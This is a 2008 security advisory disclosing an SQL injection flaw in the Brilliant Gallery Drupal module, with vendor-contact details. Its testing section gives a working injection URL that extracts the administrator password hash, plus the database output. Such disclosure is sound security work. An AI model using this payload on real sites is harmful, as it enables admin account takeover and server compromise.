-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

* Discovery Date: Sept 17, 2008
* Security risk: high
* Exploitable from: Remote
* Vulnerability: SQL Injection
* Discovered by: Justin C. Klein Keane (a.k.a. Mad Irish)

Description

Drupal (http://drupal.org) is a robust content management system (CMS)
that provides extensibility through hundreds of third party modules.
While the security of Drupal core modules is vetted by a central
security team, third party modules are not reviewed for security.

The Brilliant module (http://drupal.org/project/brilliant_gallery),
created by Vacilanda (http://www.vacilando.org/) is designed to allow
users to easily create dynamic picture galleries by uploading images
directly to a server and including code directly within nodes to display
the gallery.

The critical flaw exists within the brilliant_gallery_checklist_save()
function (lines 109-129 of briliant_gallery.module). This function
accepts three parameters ($nid,$qid, and $state), all of which can be
manipulated via a properly crafted URL (defined by a callback in
brilliant_gallery_menu() on line 307 of brilliant_gallery.module) These
parameters are then used to craft SQL injections via remote URL request.

5.x-4.1 dated 2008-Jul-17 was tested and shown vulnerable

Testing for Vulnerability

Calling the URL:

http://sitename.tld//bgchecklist/save/2/2/2'),(3,3,(select pass from
users where uid=1),3),(4,4,4,'4

will cause the administrator password to be inserted into the
brilliant_gallery_checklist table in the Drupal database:

mysql> select * from brilliant_gallery_checklist;

+-----+------+----------------------------------+-------+
| nid | user | qid                              | state |
+-----+------+----------------------------------+-------+
|   2 |    0 | 2                                |     2 |
|   3 |    3 | 4202a5f87b68583e2eaaa6922c8c38d1 |     3 |
|   4 |    4 | 4                                |     4 |
+-----+------+----------------------------------+-------+

Impact

Highly critical. Depending on configuration, this vulnerability could
allow attackers to compromise the Drupal administrator account, an
attack that can lead to web server and even host compromise since the
administrator can configure file uploads and alter any content on the
Drupal installation.
Determining Version

The brilliant_gallery.info page for vulnerable versions displays the
following information:

; $Id: brilliant_gallery.info,v 1.7.2.1 2008/07/07 20:50:01 tjfulopp Exp $
name = Brilliant Gallery
description = Creates a fully customizable table gallery of
quality-scaled images from a pre-defined folder.
dependencies = lightbox2 colorpicker
package = Media

; Information added by drupal.org packaging script on 2008-05-05
version = "5.x-3.1"
project = "brilliant_gallery"
datestamp = "1210030204"


; Information added by drupal.org packaging script on 2008-07-17
version = "5.x-4.1"
project = "brilliant_gallery"
datestamp = "1216327204"

Determining version information on Drupal sites is trivial in many cases
(ref http://www.madirish.net/?article=214).

Vendor Response

Drupal security team contacted via e-mail September 19, 2008. Vendor
contacted September 19, 2008 via contact form submission at
http://www.vacilando.eu/contact. Vulnerability announcement should be
available at http://drupal.org/security by Wednesday, September 24,
2008. No details about patch release are available at this time.

- --

Justin C. Klein Keane
http://www.MadIrish.net
http://Justin.MadIrish.net
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iPwEAQECAAYFAkjalScACgkQkSlsbLsN1gAR7Ab/bL1vvJvVhIVlkE5aOKUmH3K5
30qO/paQ8xqstrxVT/sMJYN7MXtjYL9gk73qFNhOBEgIbs9Dth7CqBMdk5vT2BiO
3lZcuNuquwLNv2ZhPK6bOUN9G0Pdmntr2YqNTgXCSPNpM7F+K75uPNENRFZKL8Yb
DLgn3q1smbJVFLm8/Xt8Y0g7Q7C8kxh7TYTK/WyhNs+KrxlzsilpAViydmqkNuVR
ob/nsYj/o5d8DN8vk0xHrvzNbeQCJX2tSZKKh6427zC6zK+dm8uTAnALpHzS/BT5
R2Oq9aOFw1BeGdcUKmk=
=QUap
-----END PGP SIGNATURE-----